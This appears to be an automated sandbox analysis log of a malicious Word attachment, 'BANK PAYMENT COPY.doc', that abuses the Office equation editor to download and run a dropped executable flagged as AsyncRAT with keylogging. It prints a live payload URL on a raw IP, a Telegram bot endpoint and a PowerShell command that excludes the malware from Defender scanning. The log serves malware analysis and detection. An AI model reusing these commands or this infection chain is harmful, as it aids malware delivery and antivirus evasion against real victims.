Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/vnobizxc.exej
Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/vnobizxc.exemmC:
Source: EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/vnobizxc.exeoC:
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: obibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: obibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49164 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary

barindex
Source: initial sample Static file information: Filename: BANK PAYMENT COPY.doc
Source: BANK PAYMENT COPY.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obibingf24242.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_00210504 5_2_00210504
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021E8C0 5_2_0021E8C0
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021B0B8 5_2_0021B0B8
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_002111B0 5_2_002111B0
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021B4F0 5_2_0021B4F0
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_002147A8 5_2_002147A8
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021C8E8 5_2_0021C8E8
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021B928 5_2_0021B928
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_0021BE10 5_2_0021BE10
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_00213EE8 5_2_00213EE8
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_00212F50 5_2_00212F50
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 7_2_001C58C0 7_2_001C58C0
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 7_2_001C4FF0 7_2_001C4FF0
Source: BANK PAYMENT COPY.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: vnobizxc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: obibingf24242.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Settings.cs Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Settings.cs Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, YqOlYl2eFwtfPkt21E.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, YqOlYl2eFwtfPkt21E.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.SetAccessControl
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.AddAccessRule
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.SetAccessControl
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.AddAccessRule
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.SetAccessControl
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs Security API names: _0020.AddAccessRule
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/13@619/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$NK PAYMENT COPY.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Mutant created: \Sessions\1\BaseNamedObjects\lsODhik7XANOkJAK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE5CC.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................$.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................;$.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................H$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................._$.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................q$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n................................$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........$.........................s............H....... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................@........$.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................@........$.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......%.........................s............H.......$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................%%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................8%.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................D%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................c%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................v%.........................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................%.........................s............H............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................%.........................s............H............................... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr Binary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()
Source: BANK PAYMENT COPY.doc ReversingLabs: Detection: 55%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: cryptsp.dll Jump to behavior
